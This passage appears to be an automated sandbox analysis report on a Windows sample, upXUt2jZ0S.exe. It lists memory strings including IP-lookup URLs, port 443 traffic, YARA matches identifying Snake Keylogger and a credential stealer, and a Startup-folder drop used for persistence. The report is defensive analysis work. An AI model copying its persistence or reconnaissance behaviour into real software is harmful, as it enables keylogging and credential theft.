            Source: upXUt2jZ0S.exe, 00000004.00000002.1554551898.0000000002616000.00000004.00000800.00020000.00000000.sdmp, upXUt2jZ0S.exe, 00000004.00000002.1554551898.00000000026B0000.00000004.00000800.00020000.00000000.sdmp, upXUt2jZ0S.exe, 00000004.00000002.1554551898.00000000026CB000.00000004.00000800.00020000.00000000.sdmp, upXUt2jZ0S.exe, 00000004.00000002.1554551898.0000000002708000.00000004.00000800.00020000.00000000.sdmp, upXUt2jZ0S.exe, 00000004.00000002.1554551898.00000000026BD000.00000004.00000800.00020000.00000000.sdmp, upXUt2jZ0S.exe, 00000004.00000002.1554551898.00000000026D9000.00000004.00000800.00020000.00000000.sdmp, .exe, 0000000A.00000002.1797959827.00000000030B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
            Source: upXUt2jZ0S.exe, 00000004.00000002.1554551898.0000000002616000.00000004.00000800.00020000.00000000.sdmp, upXUt2jZ0S.exe, 00000004.00000002.1554551898.00000000026B0000.00000004.00000800.00020000.00000000.sdmp, upXUt2jZ0S.exe, 00000004.00000002.1554551898.00000000026CB000.00000004.00000800.00020000.00000000.sdmp, upXUt2jZ0S.exe, 00000004.00000002.1554551898.0000000002659000.00000004.00000800.00020000.00000000.sdmp, upXUt2jZ0S.exe, 00000004.00000002.1554551898.0000000002708000.00000004.00000800.00020000.00000000.sdmp, upXUt2jZ0S.exe, 00000004.00000002.1554551898.00000000026BD000.00000004.00000800.00020000.00000000.sdmp, upXUt2jZ0S.exe, 00000004.00000002.1554551898.00000000026D9000.00000004.00000800.00020000.00000000.sdmp, upXUt2jZ0S.exe, 00000004.00000002.1554551898.000000000260A000.00000004.00000800.00020000.00000000.sdmp, .exe, 0000000A.00000002.1797959827.00000000030B3000.00000004.00000800.00020000.00000000.sdmp, .exe, 0000000A.00000002.1797959827.00000000030A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: upXUt2jZ0S.exe, 00000004.00000002.1554551898.0000000002551000.00000004.00000800.00020000.00000000.sdmp, .exe, 0000000A.00000002.1797959827.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: upXUt2jZ0S.exe, 00000000.00000002.2603874674.0000000004189000.00000004.00000800.00020000.00000000.sdmp, upXUt2jZ0S.exe, 00000004.00000002.1542562831.0000000000592000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
            Source: powershell.exe, 00000002.00000002.1384829264.0000000006F6C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1563393236.00000000071F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
            Source: svchost.exe, 00000005.00000002.2594028413.00000294CE884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
            Source: qmgr.db.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
            Source: qmgr.db.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
            Source: qmgr.db.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
            Source: qmgr.db.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
            Source: qmgr.db.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
            Source: qmgr.db.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
            Source: edb.log.5.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
            Source: powershell.exe, 00000002.00000002.1381308644.0000000005508000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1560390243.0000000005855000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000008.00000002.1541702733.0000000004942000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: upXUt2jZ0S.exe, 00000004.00000002.1554551898.00000000026B0000.00000004.00000800.00020000.00000000.sdmp, upXUt2jZ0S.exe, 00000004.00000002.1554551898.000000000262E000.00000004.00000800.00020000.00000000.sdmp, upXUt2jZ0S.exe, 00000004.00000002.1554551898.00000000026CB000.00000004.00000800.00020000.00000000.sdmp, upXUt2jZ0S.exe, 00000004.00000002.1554551898.0000000002708000.00000004.00000800.00020000.00000000.sdmp, upXUt2jZ0S.exe, 00000004.00000002.1554551898.00000000026BD000.00000004.00000800.00020000.00000000.sdmp, upXUt2jZ0S.exe, 00000004.00000002.1554551898.00000000026D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
            Source: powershell.exe, 00000002.00000002.1378357303.00000000044A1000.00000004.00000800.00020000.00000000.sdmp, upXUt2jZ0S.exe, 00000004.00000002.1554551898.0000000002551000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1541702733.00000000047F1000.00000004.00000800.00020000.00000000.sdmp, .exe, 0000000A.00000002.1797959827.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000008.00000002.1541702733.0000000004942000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000002.00000002.1378357303.00000000044A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1541702733.00000000047F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
            Source: powershell.exe, 00000008.00000002.1560390243.0000000005855000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000008.00000002.1560390243.0000000005855000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000008.00000002.1560390243.0000000005855000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: edb.log.5.drString found in binary or memory: https://g.live.com/odclientsettings/Prod-C:
            Source: svchost.exe, 00000005.00000003.1371247818.00000294CE670000.00000004.00000800.00020000.00000000.sdmp, edb.log.5.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2-C:
            Source: .exe.2.drString found in binary or memory: https://github.com/0xd4d/dnSpy/wiki/Debugging-Unity-Games
            Source: powershell.exe, 00000008.00000002.1541702733.0000000004942000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000002.00000002.1381308644.0000000005508000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1560390243.0000000005855000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: upXUt2jZ0S.exe, 00000004.00000002.1554551898.0000000002616000.00000004.00000800.00020000.00000000.sdmp, upXUt2jZ0S.exe, 00000004.00000002.1554551898.00000000026B0000.00000004.00000800.00020000.00000000.sdmp, upXUt2jZ0S.exe, 00000004.00000002.1554551898.00000000026CB000.00000004.00000800.00020000.00000000.sdmp, upXUt2jZ0S.exe, 00000004.00000002.1554551898.0000000002659000.00000004.00000800.00020000.00000000.sdmp, upXUt2jZ0S.exe, 00000004.00000002.1554551898.0000000002708000.00000004.00000800.00020000.00000000.sdmp, upXUt2jZ0S.exe, 00000004.00000002.1554551898.00000000026BD000.00000004.00000800.00020000.00000000.sdmp, upXUt2jZ0S.exe, 00000004.00000002.1554551898.00000000026D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: upXUt2jZ0S.exe, 00000000.00000002.2603874674.0000000004189000.00000004.00000800.00020000.00000000.sdmp, upXUt2jZ0S.exe, 00000004.00000002.1554551898.0000000002616000.00000004.00000800.00020000.00000000.sdmp, upXUt2jZ0S.exe, 00000004.00000002.1542562831.0000000000592000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: upXUt2jZ0S.exe, 00000004.00000002.1554551898.00000000026D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
            Source: upXUt2jZ0S.exe, 00000004.00000002.1554551898.00000000026B0000.00000004.00000800.00020000.00000000.sdmp, upXUt2jZ0S.exe, 00000004.00000002.1554551898.00000000026CB000.00000004.00000800.00020000.00000000.sdmp, upXUt2jZ0S.exe, 00000004.00000002.1554551898.0000000002659000.00000004.00000800.00020000.00000000.sdmp, upXUt2jZ0S.exe, 00000004.00000002.1554551898.0000000002708000.00000004.00000800.00020000.00000000.sdmp, upXUt2jZ0S.exe, 00000004.00000002.1554551898.00000000026BD000.00000004.00000800.00020000.00000000.sdmp, upXUt2jZ0S.exe, 00000004.00000002.1554551898.00000000026D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
            Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
            Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845

            System Summary

            barindex
            Source: 0.2.upXUt2jZ0S.exe.4269610.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0.2.upXUt2jZ0S.exe.4269610.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 0.2.upXUt2jZ0S.exe.4269610.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 0.2.upXUt2jZ0S.exe.4269610.2.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 0.2.upXUt2jZ0S.exe.428a240.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0.2.upXUt2jZ0S.exe.428a240.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 0.2.upXUt2jZ0S.exe.428a240.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 0.2.upXUt2jZ0S.exe.428a240.3.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 4.2.upXUt2jZ0S.exe.590000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 4.2.upXUt2jZ0S.exe.590000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 4.2.upXUt2jZ0S.exe.590000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 4.2.upXUt2jZ0S.exe.590000.0.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 0.2.upXUt2jZ0S.exe.428a240.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0.2.upXUt2jZ0S.exe.428a240.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 0.2.upXUt2jZ0S.exe.428a240.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 0.2.upXUt2jZ0S.exe.428a240.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 0.2.upXUt2jZ0S.exe.4269610.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0.2.upXUt2jZ0S.exe.4269610.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 0.2.upXUt2jZ0S.exe.4269610.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 0.2.upXUt2jZ0S.exe.4269610.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 0.2.upXUt2jZ0S.exe.41d8770.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0.2.upXUt2jZ0S.exe.41d8770.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 0.2.upXUt2jZ0S.exe.41d8770.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 00000004.00000002.1542562831.0000000000592000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 00000004.00000002.1542562831.0000000000592000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 00000000.00000002.2603874674.0000000004189000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 00000000.00000002.2603874674.0000000004189000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: Process Memory Space: upXUt2jZ0S.exe PID: 2716, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: Process Memory Space: upXUt2jZ0S.exe PID: 2716, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: Process Memory Space: upXUt2jZ0S.exe PID: 1184, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: Process Memory Space: upXUt2jZ0S.exe PID: 1184, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeJump to dropped file
            Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeCode function: 0_2_0302D3640_2_0302D364
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeCode function: 0_2_05CF0A880_2_05CF0A88
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeCode function: 0_2_05CF0A790_2_05CF0A79
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeCode function: 0_2_065017100_2_06501710
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeCode function: 0_2_0650E5200_2_0650E520
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeCode function: 0_2_06502C000_2_06502C00
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeCode function: 4_2_0083C1D14_2_0083C1D1
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeCode function: 4_2_008361084_2_00836108
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeCode function: 4_2_0083B3284_2_0083B328
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeCode function: 4_2_0083C4B14_2_0083C4B1
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeCode function: 4_2_0083C7904_2_0083C790
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeCode function: 4_2_008367304_2_00836730
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeCode function: 4_2_008398584_2_00839858
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeCode function: 4_2_00834AD94_2_00834AD9
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeCode function: 4_2_0083CA704_2_0083CA70
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeCode function: 4_2_0083CD514_2_0083CD51
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeCode function: 4_2_0083BEF04_2_0083BEF0
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeCode function: 4_2_0083B4F24_2_0083B4F2
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeCode function: 4_2_008335704_2_00833570
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 7_2_014BD3647_2_014BD364
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 7_2_072617107_2_07261710
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 7_2_0726E5207_2_0726E520
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 7_2_07262C007_2_07262C00
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 10_2_0137357810_2_01373578
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7624 -s 1528
            Source: upXUt2jZ0S.exe, 00000000.00000002.2588995313.000000000148E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs upXUt2jZ0S.exe
            Source: upXUt2jZ0S.exe, 00000000.00000002.2592580416.0000000003181000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAQipUvwTwkLZyiCs.dll: vs upXUt2jZ0S.exe
            Source: upXUt2jZ0S.exe, 00000000.00000002.2592580416.0000000003181000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs upXUt2jZ0S.exe
            Source: upXUt2jZ0S.exe, 00000000.00000000.1344261917.0000000000F0A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameInochia.exe0 vs upXUt2jZ0S.exe
            Source: upXUt2jZ0S.exe, 00000000.00000002.2603874674.0000000004189000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameExample.dll0 vs upXUt2jZ0S.exe
            Source: upXUt2jZ0S.exe, 00000000.00000002.2603874674.0000000004189000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs upXUt2jZ0S.exe
            Source: upXUt2jZ0S.exe, 00000004.00000002.1542562831.0000000000592000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs upXUt2jZ0S.exe
            Source: upXUt2jZ0S.exeBinary or memory string: OriginalFilenameInochia.exe0 vs upXUt2jZ0S.exe
            Source: upXUt2jZ0S.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 0.2.upXUt2jZ0S.exe.4269610.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0.2.upXUt2jZ0S.exe.4269610.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.upXUt2jZ0S.exe.4269610.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 0.2.upXUt2jZ0S.exe.4269610.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 0.2.upXUt2jZ0S.exe.428a240.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0.2.upXUt2jZ0S.exe.428a240.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.upXUt2jZ0S.exe.428a240.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 0.2.upXUt2jZ0S.exe.428a240.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 4.2.upXUt2jZ0S.exe.590000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 4.2.upXUt2jZ0S.exe.590000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 4.2.upXUt2jZ0S.exe.590000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 4.2.upXUt2jZ0S.exe.590000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 0.2.upXUt2jZ0S.exe.428a240.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0.2.upXUt2jZ0S.exe.428a240.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.upXUt2jZ0S.exe.428a240.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 0.2.upXUt2jZ0S.exe.428a240.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 0.2.upXUt2jZ0S.exe.4269610.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0.2.upXUt2jZ0S.exe.4269610.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.upXUt2jZ0S.exe.4269610.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 0.2.upXUt2jZ0S.exe.4269610.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 0.2.upXUt2jZ0S.exe.41d8770.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0.2.upXUt2jZ0S.exe.41d8770.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 0.2.upXUt2jZ0S.exe.41d8770.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 00000004.00000002.1542562831.0000000000592000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 00000004.00000002.1542562831.0000000000592000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 00000000.00000002.2603874674.0000000004189000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
